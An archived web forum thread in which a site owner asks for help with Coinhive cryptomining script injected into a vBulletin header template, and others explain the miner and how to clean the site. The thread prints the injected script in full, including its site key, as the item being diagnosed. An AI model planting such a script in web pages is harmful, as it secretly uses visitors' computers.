Go Back   vb.org Archive > Community Discussions > Forum and Server Management
  #1  
Old 02-19-2018, 08:27 AM
blind-eddie's Avatar
blind-eddie blind-eddie is offline
 
Join Date: Apr 2006
Location: Michigan
Posts: 2,310
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Coinhive malware

Norton says the site listed below is infected with malware.
Only thing I can find is the following in the headerinclude template.
Can someone educate me a bit about this and what needs to be done to clean this up?


Code:
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('dVRmwWPwfXxbAVw0swtjIgNk3hOSnexr');
	miner.start();
</script>

Code:
https://safeweb.norton.com/report/show?url=ctsubie.com

https://sitecheck.sucuri.net/results/ctsubie.com
Reply With Quote
  #2  
Old 02-19-2018, 11:33 AM
Dave Dave is offline
 
Join Date: May 2010
Posts: 2,583
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

CoinHive is a cryptocurrency miner which uses CPU power of the people that are visiting the forum to mine cryptocurrencies. It's basically an alternative to showing ads, but unethical in my opinion.

It's usually based on third party scripts so just removing the code is fine most of the time.
Reply With Quote
Благодарность от:
blind-eddie
  #3  
Old 02-19-2018, 12:56 PM
In Omnibus's Avatar
In Omnibus In Omnibus is offline
 
Join Date: Apr 2010
Location: Inside A Blade Server
Posts: 840
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by Dave View Post
CoinHive is a cryptocurrency miner which uses CPU power of the people that are visiting the forum to mine cryptocurrencies. It's basically an alternative to showing ads, but unethical in my opinion.

It's usually based on third party scripts so just removing the code is fine most of the time.
It's not just your opinion. Cryptocurrency miners have been classified as malware.
Reply With Quote
Благодарность от:
blind-eddie
  #4  
Old 02-23-2018, 12:29 PM
romaine's Avatar
romaine romaine is offline
 
Join Date: Jan 2015
Posts: 70
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by blind-eddie View Post
Norton says the site listed below is infected with malware.
Only thing I can find is the following in the headerinclude template.
Can someone educate me a bit about this and what needs to be done to clean this up?
You need to everyplace on your hosting and reupload files...If you only remove codes from that template then the problem will be not solved completely and you can get it back.

Try to contact this guy https://forumweb.hosting/17636-virus...to-defend.html

He can help you to scan and remove malware/virus on web hosting server.
Reply With Quote
Благодарность от:
blind-eddie
  #5  
Old 02-23-2018, 10:07 PM
blind-eddie's Avatar
blind-eddie blind-eddie is offline
 
Join Date: Apr 2006
Location: Michigan
Posts: 2,310
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Thank you all for your replies, we got it straightened out.
Reply With Quote
  #6  
Old 02-25-2018, 09:22 AM
ForceHSS ForceHSS is offline
 
Join Date: Apr 2008
Posts: 6,357
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by blind-eddie View Post
Thank you all for your replies, we got it straightened out.
Still showing me you have the virus I use ESET Smart Security
Reply With Quote
  #7  
Old 06-28-2018, 10:40 PM
Josh789 Josh789 is offline
 
Join Date: Apr 2015
Posts: 5
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by blind-eddie View Post
Thank you all for your replies, we got it straightened out.
Can you please elaborate on how?
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 12:20 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04421 seconds
  • Memory Usage 2,223KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (2)bbcode_code
  • (4)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (7)post_thanks_box
  • (3)post_thanks_box_bit
  • (7)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (3)post_thanks_postbit
  • (7)post_thanks_postbit_info
  • (7)postbit
  • (7)postbit_onlinestatus
  • (7)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • fetch_musername
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • post_thanks_function_fetch_thanks_bit_start
  • post_thanks_function_show_thanks_date_start
  • post_thanks_function_show_thanks_date_end
  • post_thanks_function_fetch_thanks_bit_end
  • post_thanks_function_fetch_post_thanks_template_start
  • post_thanks_function_fetch_post_thanks_template_end
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete